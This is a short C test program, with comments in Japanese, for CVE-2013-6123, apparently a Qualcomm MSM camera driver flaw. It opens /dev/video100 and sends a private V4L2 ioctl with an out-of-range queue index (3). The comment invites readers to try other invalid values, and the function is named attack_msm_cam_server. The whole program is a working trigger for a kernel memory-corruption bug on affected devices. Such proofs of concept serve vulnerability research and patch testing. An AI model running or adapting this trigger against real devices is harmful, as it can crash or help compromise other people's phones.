CVE-2013-6123 テストコード

1. /*
2. CVE-2013-6123 のテストコード。
3. u_isp_event.isp_data.ctrl.queue_idx = 3
4. の値を0～2以外にして遊んでみてください。
5. */
6.  
7. #include <stdio.h>
8. #include <stdint.h>
9. #include <stdlib.h>
10. #include <unistd.h>
11. #include <fcntl.h>
12. #include <string.h>
13. #include <errno.h>
14. #include <sys/ioctl.h>
15.  
16. #define DEVVIDEO "/dev/video100"
17.  
18. #define BASE_VIDIOC_PRIVATE 192 /* 192-255 are private */
19. #define MSM_CAM_V4L2_IOCTL_GET_EVENT_PAYLOAD \
20. _IOWR('V', BASE_VIDIOC_PRIVATE + 5, struct msm_camera_v4l2_ioctl_t)
21.  
22. #define MAX_PLANES 8
23.  
24. struct msm_camera_v4l2_ioctl_t {
25. uint32_t id;
26. uint32_t len;
27. int32_t trans_code;
28. void __user *ioctl_ptr;
29. };
30.  
31. struct msm_ctrl_cmd {
32. uint16_t type;
33. uint16_t length;
34. void *value;
35. uint16_t status;
36. uint32_t timeout_ms;
37. int resp_fd; /* FIXME: to be used by the kernel, pass-through for now */
38. int vnode_id; /* video dev id. Can we overload resp_fd? */
39. int queue_idx;
40. uint32_t evt_id;
41. uint32_t stream_type; /* used to pass value to qcamera server */
42. int config_ident; /*used as identifier for config node*/
43. };
44.  
45. struct msm_cam_evt_msg {
46. unsigned short type; /* 1 == event (RPC), 0 == message (adsp) */
47. unsigned short msg_id;
48. unsigned int len; /* size in, number of bytes out */
49. uint32_t frame_id;
50. void *data;
51. struct timespec timestamp;
52. };
53.  
54. struct msm_pp_frame_sp {
55. /* phy addr of the buffer */
56. unsigned long phy_addr;
57. uint32_t y_off;
58. uint32_t cbcr_off;
59. /* buffer length */
60. uint32_t length;
61. int32_t fd;
62. uint32_t addr_offset;
63. /* mapped addr */
64. unsigned long vaddr;
65. };
66.  
67. struct msm_pp_frame_mp {
68. /* phy addr of the plane */
69. unsigned long phy_addr;
70. /* offset of plane data */
71. uint32_t data_offset;
72. /* plane length */
73. uint32_t length;
74. int32_t fd;
75. uint32_t addr_offset;
76. /* mapped addr */
77. unsigned long vaddr;
78. };
79.  
80. struct msm_pp_frame {
81. uint32_t handle; /* stores vb cookie */
82. uint32_t frame_id;
83. unsigned short buf_idx;
84. int path;
85. unsigned short image_type;
86. unsigned short num_planes; /* 1 for sp */
87. struct timeval timestamp;
88. union {
89. struct msm_pp_frame_sp sp;
90. struct msm_pp_frame_mp mp[MAX_PLANES];
91. };
92. int node_type;
93. uint32_t inst_handle;
94. };
95.  
96. struct msm_cam_evt_divert_frame {
97. unsigned short image_mode;
98. unsigned short op_mode;
99. unsigned short inst_idx;
100. unsigned short node_idx;
101. struct msm_pp_frame frame;
102. int do_pp;
103. };
104.  
105. struct msm_mctl_pp_cmd_ack_event {
106. uint32_t cmd; /* VPE_CMD_ZOOM? */
107. int status; /* 0 done, < 0 err */
108. uint32_t cookie; /* daemon's cookie */
109. };
110.  
111. struct msm_mctl_pp_event_info {
112. int32_t event;
113. union {
114. struct msm_mctl_pp_cmd_ack_event ack;
115. };
116. };
117.  
118. struct msm_isp_event_ctrl {
119. unsigned short resptype;
120. union {
121. struct msm_cam_evt_msg isp_msg;
122. struct msm_ctrl_cmd ctrl;
123. struct msm_cam_evt_divert_frame div_frame;
124. struct msm_mctl_pp_event_info pp_event_info;
125. } isp_data;
126. };
127.  
128. int attack_msm_cam_server() {
129. int fd0, fd;
130. int ret;
131. struct msm_camera_v4l2_ioctl_t arg;
132. struct msm_isp_event_ctrl u_isp_event;
133.  
134. fd = open(DEVVIDEO, O_RDONLY);
135. if (fd < 0) {
136. fprintf(stderr, "%s open error %s.\n", DEVVIDEO, strerror(errno));
137. return -1;
138. }
139. fprintf(stderr, "%s open OK!\n", DEVVIDEO);
140.  
141. u_isp_event.isp_data.ctrl.queue_idx = 3;
142. arg.ioctl_ptr = (void *)&u_isp_event;
143. ret = ioctl(fd, MSM_CAM_V4L2_IOCTL_GET_EVENT_PAYLOAD, &arg);
144. if (ret < 0) {
145. fprintf(stderr, "ioctl error: %s.\n", strerror(errno));
146. }
147.  
148. close(fd);
149.  
150. return 0;
151. }
152.  
153. int main(int argc, char **argv) {
154. attack_msm_cam_server();
155. return 0;
156. }